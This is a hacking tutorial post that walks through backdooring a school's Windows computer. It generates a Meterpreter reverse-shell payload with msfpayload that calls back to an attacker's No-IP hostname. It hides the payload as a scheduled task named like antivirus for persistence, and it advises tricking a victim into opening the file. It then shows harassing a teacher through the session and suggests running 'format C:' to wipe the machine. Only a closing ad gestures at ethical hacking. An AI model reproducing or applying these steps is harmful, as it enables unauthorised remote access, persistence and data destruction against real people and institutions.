Hi there, Elites Welcome to my 6th post,
This tutorial will explain how to hack windows, using a program (No-IP)
and windows's inbuilt Task Scheduler.
- Task Scheduler:
It is a program, inbuilt in windows, which allows us to create some tasks and execute them at specific timings.
For eg: If we want an application/program/script to run on specific days/time etc.
It is rather a website, which allows us to convert our dynamic external IP to a static DNS. (You will understand this later, Just think of it as a static external IP)
-For this, you have to:
1)Download the Dynamic DNS Update Client (DUC) from this website.
2)Sign up, to create hosts.
3)When you are logged in then:
4)Click on Add a Host.
5) Put in a host name and then Click Add Host. (Don't modify anything else)
6) Configured (Almost)
7) Now, open DUC, from, where it is installed.
8) Click on Edit Hosts, Choose the one you just created, click save.
9) REMEMBER! You will always have to open this while the hacking process (and it should be remained open)
Now lets assume a situation, when we have to hack a school's computer, that has internet access, and we can only use the guest account.
- Fire-up Kali.
- Open msfconsole
- Create a backdoor, using this command:
- msfpayload windows/meterpreter/reverse_tcp_dns LHOST=hostname.ddns.net X > /root/Upgrader.exe
- Replace hostname with the hostname you specified.
- Upload the file to a website or use google drive or a flash drive.
- Get admin privileges on that computer.
- Open administrator account.
- Download/Transfer the backdoor from that website or flash drive.
- Open Task Scheduler (Search it with the name: Schedule Tasks)
- Click on 'Create Task...'
- Enter any Name and Description of the task (Lets say: Avast Antivirus)
- Choose the options: 1) Run whether the user is logged on or not. and 2) Run with highest Privilages.
- Go to Triggers Tab, and click New...
- And um.. Just Do whatever it is in the Picture above...
- There is no need to change in start time, like mine.
- Click OK.
- Move to Actions tab, click New...
- Action: Start a program, browse for the backdoor you just downloaded.
- Click OK
- On to Conditions tab.
- Leave it be...
- On to Setting tab...
- Copy what I just did...
- Click OK.
Your task is ready and running...
BUT, IF YOU DON'T HAVE PHYSICAL ACCESS TO THE PC THEN:
- Convince victim to open the file.
- Make the WHOLE task scheduler batch script folloing this guide:
- ................CLICK ME...............
- Sorry I am real lazy to make it for you, but i think someday I'll change my mind maybe.
- Use kali to Upload the script, and make it execute.
You can only exploit that PC if you have taken a leave but the School has a working day (I always do it on Saturdays)
In other words...
THE PC SHOULD BE ON! AND CONNECTED TO INTERNET!
- Start-Up Kali again.
- Set-Up a multi-handler
- A slight change in payload:
- set payload windows/meterpreter/reverse_tcp_dns
- AFTER (Every) 5 min BOOM!
Free-of-Cost, we have made the persistence for forever.
WARNING! This won't work on android.
- Time to See whats going on at school...
Ooh! A Teacher, Lets say Hi/Hello to her.
- Using Notepad...
- screenshot for proof...
My job has finished here as a hacker, but if you are a Cracker, then, umm.. a TIP:
- Open shell
- Type: format C:
- Y *
This will etc. etc. etc. you PC.
Keep coming back tip-notches!
Want to start making money as a white hat hacker? Jump-start your white-hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from ethical hacking professionals.